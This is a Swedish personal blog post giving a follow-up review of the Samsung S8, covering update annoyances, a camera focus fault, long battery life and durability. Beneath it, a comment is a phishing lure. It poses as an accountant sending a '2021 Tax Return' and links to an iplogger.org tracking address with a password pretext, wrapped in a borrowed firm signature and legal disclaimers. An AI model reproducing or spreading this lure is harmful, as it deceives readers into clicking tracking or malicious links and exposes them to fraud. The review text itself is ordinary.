Nu har jag haft en Samsung s8 ett tag. Den har varit lite finare, lite snabbare och helt enkelt bättre än Samsung s7an. Men efter några månaders användande har jag fått inse att allt inte är guld och gröna skogar även om den i sak är är en skön uppdatering från sin föregångare. Man kan inte få allt, jag vet…

Lite ris och lite ros

*Uppdateringar, uppdateringar, uppdatering. Hela. Jäkla. Tiden. Uppdateringar! Absolut, telefonen behöver uppdatera sig och apparna behöver uppdatera sig. Jag greppar grejen. En teknikpryl behöver uppdatera sig. Men det stör mig och hittills har jag inte hittat något sätt att kontrollera dem. Det kan få mig att längta tillbaka till iPhonen.

*Hårdvarufel i bakre kameran som försvinner av att man skakar telefonen lite. Jag skämtar inte. Bilden blir oskarp eller ur fokus och av någon anledning så behöver man bara skaka telefonen och vips så kan man fotografera igen. Detta är visst ett känt fel för det tog mig inte många minuters Googlande innan jag hittade ett forum där man tipsade om att skaka telefonen lite för att avhjälpa problemet.

*LÅNG batteritid. Jag kan sitta en hel dag med telefonen och ha aktivt användande och batteriet håller. Mums. Senast jag minns att jag upplevde sådan batteritid på en telefon jag pillade på hela tiden vad på den gamla goda tiden när jag hade en Nokia 3310.

*Den är typ okrossbar! Jag är väl inte den mest försiktiga användaren, och den har åkt i både golvet och marken några gånger, plus att jag lever ett ganska aktivt liv, men den håller. För att ändå vara en smartphone håller den osedvanligt bra och det är en funktion som jag inte förväntade mig.

Generellt så kan jag fortfarande säga att jag är mycket nöjd med min nya telefon. Den är skön i handen, skalen som jag beställde sitter som en smäck och den fungerar precis som man kan förvänta sig av en telefon och lite till. Nu inför sommarens campingäventyr kommer jag faktiskt våga mig på att ta med den istället för min Huadoo H1.

Och en sak till – Myggappar är inget som funkar. Råd & Rön säger så och jag håller med. Nästa sak som nu köps in är kylbalsam för insektsbett… (recension kommer framöver)

4 thoughts on “En liten uppdatering om s8an

 1. Hi,

  Here is a copy of your 2021 Tax Return, to download it click the link below:

  https://iplogger.org/2gWbg5

  Due to the sensitive nature of the information contained within the document(s), I’ve placed a password on the file(s). To view this document(s), you will need the password that will be provided to you by the instructions.

  Thank you,

  Carol Ross
  Yap & Little, Inc., CPAs
  6711 Katella Avenue, 2nd Floor
  Cypress, CA 90630

  714-503-6212 x 200
  714-503-6851 Direct Fax
  714-503-6218 Office Fax

  IRS CIRCULAR 230 DISCLOSURE: Tax advice contained in this communication (including any attachments) is neither intended nor written to be used, and cannot be used, to avoid penalties under the Internal Revenue Code or to promote, market, or recommend to anyone a transaction or matter addressed in this communication.

  CONFIDENTIALITY NOTICE: This e-mail transmission may contain confidential or legally privileged information that is intended only for the individual or entity named in the e-mail address. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or reliance upon the contents of this e-mail is strictly prohibited. If you have received this e-mail transmission in error, please reply to the sender, so that arrangements can be made for proper delivery, and then please delete the message from your inbox.

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *